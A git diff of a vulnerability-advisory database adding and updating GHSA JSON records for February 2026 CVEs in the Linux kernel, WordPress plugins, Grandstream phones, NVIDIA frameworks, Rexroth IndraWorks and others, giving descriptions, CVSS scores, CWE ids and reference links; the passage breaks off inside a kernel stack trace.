b/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mx8g-qc6m-wcmf", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23218" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: loongson-64bit: Fix incorrect NULL check after devm_kcalloc()\n\nFix incorrect NULL check in loongson_gpio_init_irqchip().\nThe function checks chip->parent instead of chip->irq.parents.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23218" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e34f77b09080c86c929153e2a72da26b4f8947ff" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e71e3fa90a15134113f61343392e887cd1f4bf7c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json b/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json new file mode 100644 index 0000000000000..ebb7bcea28c29 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p4q3-g549-vvfc", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-1582" + ], + "details": "The WP All Export plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.14 via the export download endpoint. This is due to a PHP type juggling vulnerability in the security token comparison which uses loose comparison (==) instead of strict comparison (===). This makes it possible for unauthenticated attackers to bypass authentication using \"magic hash\" values when the expected MD5 hash prefix happens to be numeric-looking (matching pattern ^0e\\d+$), allowing download of sensitive export files containing PII, business data, or database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1582" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-all-export/tags/1.4.14/actions/wp_loaded.php#L19" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455775" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a92c682-b8b3-4d23-bd84-97d7440ee525?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json index 2d40cf4763f91..edb136c8f66c1 100644 --- a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json +++ b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pc38-57g8-39gg", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-69752" ], "details": "An issue in the \"My Details\" user profile functionality of Ideagen Q-Pulse 7.1.0.32 allows an authenticated user to view other users' profile information by modifying the objectKey HTTP parameter in the My Details page URL.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T16:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json new file mode 100644 index 0000000000000..4bcf8b83f90d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phqg-p332-q7vc", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23212" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: annotate data-races around slave->last_rx\n\nslave->last_rx and slave->target_last_arp_rx[...] can be read and written\nlocklessly. Add READ_ONCE() and WRITE_ONCE() annotations.\n\nsyzbot reported:\n\nBUG: KCSAN: data-race in bond_rcv_validate / bond_rcv_validate\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 1:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n...\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 0:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n br_netif_receive_skb net/bridge/br_input.c:30 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n...\n\nvalue changed: 0x0000000100005365 -> 0x0000000100005366", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23212" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c0be3277e7aefb2f900fc37ca3fe7df362e26f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a7516cb0165926d308187e231ccd330e5e3ebff7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b956289b83887e0a306067b6003c3fcd81bfdf84" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bd98324e327e41de04b13e372cc16f73150df254" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f6c3665b6dc53c3ab7d31b585446a953a74340ef" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json index 0242e02b8a189..d7850968c5787 100644 --- a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json +++ b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-918" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json new file mode 100644 index 0000000000000..8039ad0742203 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq2v-q6qr-p5vx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33251" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33251" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33251" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json new file mode 100644 index 0000000000000..00126b1233e55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq7g-427f-cm2r", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-1426" + ], + "details": "The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibility layer. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. Note: This vulnerability requires the Live Composer plugin to also be installed and active.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1426" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/502.html" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L25" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L33" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449344/#file418" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e76d57-217f-4f21-8bc6-a86290783a19?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json new file mode 100644 index 0000000000000..7f5cad051600a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r264-whc7-wwfw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71226" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: Implement settime64 as stub for MVM/MLD PTP\n\nSince commit dfb073d32cac (\"ptp: Return -EINVAL on ptp_clock_register if\nrequired ops are NULL\"), PTP clock registered through ptp_clock_register\nis required to have ptp_clock_info.settime64 set, however, neither MVM\nnor MLD's PTP clock implementation sets it, resulting in warnings when\nthe interface starts up, like\n\nWARNING: drivers/ptp/ptp_clock.c:325 at ptp_clock_register+0x2c8/0x6b8, CPU#1: wpa_supplicant/469\nCPU: 1 UID: 0 PID: 469 Comm: wpa_supplicant Not tainted 6.18.0+ #101 PREEMPT(full)\nra: ffff800002732cd4 iwl_mvm_ptp_init+0x114/0x188 [iwlmvm]\nERA: 9000000002fdc468 ptp_clock_register+0x2c8/0x6b8\niwlwifi 0000:01:00.0: Failed to register PHC clock (-22)\n\nI don't find an appropriate firmware interface to implement settime64()\nfor iwlwifi MLD/MVM, thus instead create a stub that returns\n-EOPTNOTSUPP only, suppressing the warning and allowing the PTP clock to\nbe registered.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71226" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81d90d93d22ca4f61833cba921dce9a0bd82218f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ff6892ea544c4052dd5799f675ebc20419953801" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json new file mode 100644 index 0000000000000..0c7963d6b7ddd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m3-cm43-fxrj", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2329" + ], + "details": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2329" + }, + { + "type": "WEB", + "url": "https://github.com/rapid7/metasploit-framework/pull/20983" + }, + { + "type": "WEB", + "url": "https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf" + }, + { + "type": "WEB", + "url": "https://psirt.grandstream.com" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json new file mode 100644 index 0000000000000..bd2e0e158666f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r77x-pqm4-6252", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60037" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60037" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json new file mode 100644 index 0000000000000..c577f818717f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgjw-pqcr-56gf", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-14340" + ], + "details": "Cross-site scripting in REST Management Interface in Payara Server <4.1.2.191.54, <5.83.0, <6.34.0, <7.2026.1 allows an attacker to mislead the administrator to change the admin password via URL Payload.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:X/RE:M/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14340" + }, + { + "type": "WEB", + "url": "https://docs.payara.fish/enterprise/docs/Security/Security%20Fix%20List.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json new file mode 100644 index 0000000000000..a0dc26782875f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjm5-gmfm-6cp4", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2656" + ], + "details": "A flaw has been found in ChaiScript up to 6.1.0. This affects the function chaiscript::Type_Info::bare_equal of the file include/chaiscript/dispatchkit/type_info.hpp. This manipulation causes use after free. The attack requires local access. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2656" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636#issue-3828333582" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json new file mode 100644 index 0000000000000..da27a8ec09d4a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv75-v2gv-p54c", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33239" + ], + "details": "NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33239" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33239" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json index 819900c824fed..d660ca2f4621d 100644 --- a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json +++ b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rvhp-mghq-8mvw", - "modified": "2026-02-14T00:32:42Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70957" ], "details": "A Denial of Service (DoS) vulnerability was discovered in the TON Lite Server before v2024.09. The vulnerability arises from the handling of external arguments passed to locally executed \"get methods.\" An attacker can inject a constructed Continuation object (an internal TVM type) that is normally restricted within the VM. When the TVM executes this malicious continuation, it consumes excessive CPU resources while accruing disproportionately low virtual gas costs. This \"free\" computation allows an attacker to monopolize the Lite Server's processing power, significantly reducing its throughput and causing a denial of service for legitimate users acting through the gateway.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T22:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json new file mode 100644 index 0000000000000..94425dd4e91d3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfmw-4jmp-wmrw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60035" + ], + "details": "A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the OPC.Testclient.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60035" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json new file mode 100644 index 0000000000000..248e19f7829d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqcj-rgfw-jjcq", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23214" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: reject new transactions if the fs is fully read-only\n\n[BUG]\nThere is a bug report where a heavily fuzzed fs is mounted with all\nrescue mount options, which leads to the following warnings during\nunmount:\n\n BTRFS: Transaction aborted (error -22)\n Modules linked in:\n CPU: 0 UID: 0 PID: 9758 Comm: repro.out Not tainted\n 6.19.0-rc5-00002-gb71e635feefc #7 PREEMPT(full)\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\n RIP: 0010:find_free_extent_update_loop fs/btrfs/extent-tree.c:4208 [inline]\n RIP: 0010:find_free_extent+0x52f0/0x5d20 fs/btrfs/extent-tree.c:4611\n Call Trace:\n \n btrfs_reserve_extent+0x2cd/0x790 fs/btrfs/extent-tree.c:4705\n btrfs_alloc_tree_block+0x1e1/0x10e0 fs/btrfs/extent-tree.c:5157\n btrfs_force_cow_block+0x578/0x2410 fs/btrfs/ctree.c:517\n btrfs_cow_block+0x3c4/0xa80 fs/btrfs/ctree.c:708\n btrfs_search_slot+0xcad/0x2b50 fs/btrfs/ctree.c:2130\n btrfs_truncate_inode_items+0x45d/0x2350 fs/btrfs/inode-item.c:499\n btrfs_evict_inode+0x923/0xe70 fs/btrfs/inode.c:5628\n evict+0x5f4/0xae0 fs/inode.c:837\n __dentry_kill+0x209/0x660 fs/dcache.c:670\n finish_dput+0xc9/0x480 fs/dcache.c:879\n shrink_dcache_for_umount+0xa0/0x170 fs/dcache.c:1661\n generic_shutdown_super+0x67/0x2c0 fs/super.c:621\n kill_anon_super+0x3b/0x70 fs/super.c:1289\n btrfs_kill_super+0x41/0x50 fs/btrfs/super.c:2127\n deactivate_locked_super+0xbc/0x130 fs/super.c:474\n cleanup_mnt+0x425/0x4c0 fs/namespace.c:1318\n task_work_run+0x1d4/0x260 kernel/task_work.c:233\n exit_task_work include/linux/task_work.h:40 [inline]\n do_exit+0x694/0x22f0 kernel/exit.c:971\n do_group_exit+0x21c/0x2d0 kernel/exit.c:1112\n __do_sys_exit_group kernel/exit.c:1123 [inline]\n __se_sys_exit_group kernel/exit.c:1121 [inline]\n __x64_sys_exit_group+0x3f/0x40 